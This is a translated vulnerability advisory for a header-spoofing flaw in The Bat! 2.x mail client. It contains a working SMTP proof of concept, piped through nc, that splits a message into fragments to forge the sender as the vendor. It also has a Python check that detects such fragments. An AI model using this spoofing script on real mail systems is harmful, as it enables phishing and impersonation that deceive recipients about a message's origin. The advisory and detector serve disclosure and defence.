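The Bat! 2.x Mail Header Spoofing Vulnerability

Release date: 2006-02-05
Updated: 2006-02-05

Affected systems:
Rit Research Labs The Bat! 2.x
Unaffected systems:
Rit Research Labs The Bat! 3.5
Description:
The Bat! is an easy-to-use mail client.

A flaw in the way The Bat! displays messages may allow a remote attacker to forge a message's header information and hide the true origin of the mail.

The Bat! automatically reassembles fragmented messages, and the headers it displays are those of the reassembled message. This lets an attacker spoof or hide the RFC 822 headers of the message, including all "Received:" fields and "Message-ID:", and so create mail with a forged origin.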

<*Source: 3APA3A (3APA3A@security.nnov.ru)
  
  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=113925620110345&w=2
*>

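Test method:

Warning

The following procedure (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Replace @example.com with the target address.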

nc ip_of_smtp_relay 25 <thebatexploit.txt


-=-=-=-=- begin thebatexploit.txt -=-=-=-=-
HELO example.com
MAIL FROM: <phiby@example.com>
RCPT TO: <phiby@example.com>
DATA
Date: Mon, 31 Jan 2006 13:30:00 +0300
From: 3APA3A <phiby@example.com>
X-Mailer: The Bat! (v2.12.00)
Organization: http://www.security.nnov.ru/
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@thebat.net>
To: Phiby <phiby@example.com>
Subject: Subject: Re[7]: //
Message-ID: <p#1split@ACB0994591752.20060130184706@thebat.net>
MIME-Version: 1.0
Content-Type: message/partial; id="split@ACB0994591752.20060130184706@thebat.net";
        number=1; total=2

Received: from mail.ritlabs.com (mail.ritlabs.com [198.63.208.135])
        by mail.example.com (Postfix) with ESMTP id 9F89619EBEB
        for <phiby@example.com>; Mon, 31 Jan 2006 13:30:06 +0300 (MSK)
Date: Mon, 31 Jan 2006 13:30:06 +0300
From: The Bat! developers <bugs@thebat.net>
X-Mailer: The Bat! (v2.12.00)
Organization: RitLabs
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@thebat.net>
To: Phiby <phiby@example.com>
Subject: Subject: Re[7]: //
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit

Dear Phiby,

Best wishes for you and http://phiby.com/
.
RSET
MAIL FROM: <phiby@example.com>
RCPT TO: <phiby@example.com>
DATA
Date: Mon, 30 Jan 2006 13:30:06 +0300
From: 3APA3A <phiby@example.com>
Organization: http://www.security.nnov.ru/
X-Mailer: The Bat! (v2.12.00)
Organization: Microsoft
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@thebat.net>
To: Phiby <phiby@example.com>
Subject: Subject: Re[7]: //
Message-ID: <p#2split@ACB0994591752.20060130184706@microsof.com>
MIME-Version: 1.0
Content-Type: message/partial; id="split@ACB0994591752.20060130184706@thebat.net";
        number=2; total=2

Yours, The Bat! develpment team.
.
QUIT
-=-=-=-=-  end thebatexploit.txt  -=-=-=-=-

Recommendation:
Vendor patch:

Rit Research Labs
-----------------
The vendor has released an upgrade that fixes this security issue. Download it from the vendor's home page:

http://thebat.net/en/products/thebat/download.php
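
A gateway or mailbox check for the fragment pattern described above, as an added example that is not part of the original advisory or the vendor's fix: it flags message/partial first fragments whose enclosed message carries its own Received: lines or a From: that differs from the outer one. The function name, the constructed sample message and both heuristics are assumptions.

```python
import email
import email.utils

# Constructed sample (placeholder hosts and addresses): fragment 1 of 2, whose
# body is an enclosed message with its own Received:/From:/Message-ID: lines.
SAMPLE = b"""\
Received: from relay.example.net by mx.example.com; Mon, 30 Jan 2006 13:30:00 +0300
From: Sender <sender@example.net>
Message-ID: <outer-1@example.net>
MIME-Version: 1.0
Content-Type: message/partial; id="frag@example.net";
        number=1; total=2

Received: from mail.vendor.example by mx.example.com; Mon, 30 Jan 2006 13:30:06 +0300
From: Vendor Support <support@vendor.example>
Message-ID: <inner-1@vendor.example>
Content-Type: text/plain

Dear user,
"""

def check_partial(raw: bytes):
    """Return None for ordinary mail, else a list of findings for a fragment."""
    outer = email.message_from_bytes(raw)
    if outer.get_content_type() != "message/partial":
        return None
    number, total = outer.get_param("number"), outer.get_param("total")
    findings = [f"fragment {number}/{total} id={outer.get_param('id')}"]
    if number != "1":
        return findings  # only fragment 1 carries the enclosed headers
    # The stdlib parser exposes a message/* body as one nested Message.
    body = outer.get_payload()
    inner = body[0] if isinstance(body, list) and body else email.message_from_string("")
    # Heuristic (assumption): mail has no Received: lines before it is
    # submitted, so any inside the fragment were supplied by the sender.
    if inner.get_all("Received"):
        findings.append("enclosed Received: header(s) present")
    # RFC 2046 reassembly keeps the outer From:; a different enclosed From: is
    # what a client showing the enclosed headers would display instead.
    o_from = email.utils.parseaddr(outer.get("From", ""))[1].lower()
    i_from = email.utils.parseaddr(inner.get("From", ""))[1].lower()
    if i_from and i_from != o_from:
        findings.append(f"enclosed From {i_from} differs from outer {o_from}")
    return findings

if __name__ == "__main__":
    for line in check_partial(SAMPLE) or ["not a message/partial fragment"]:
        print(line)
```
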

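This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.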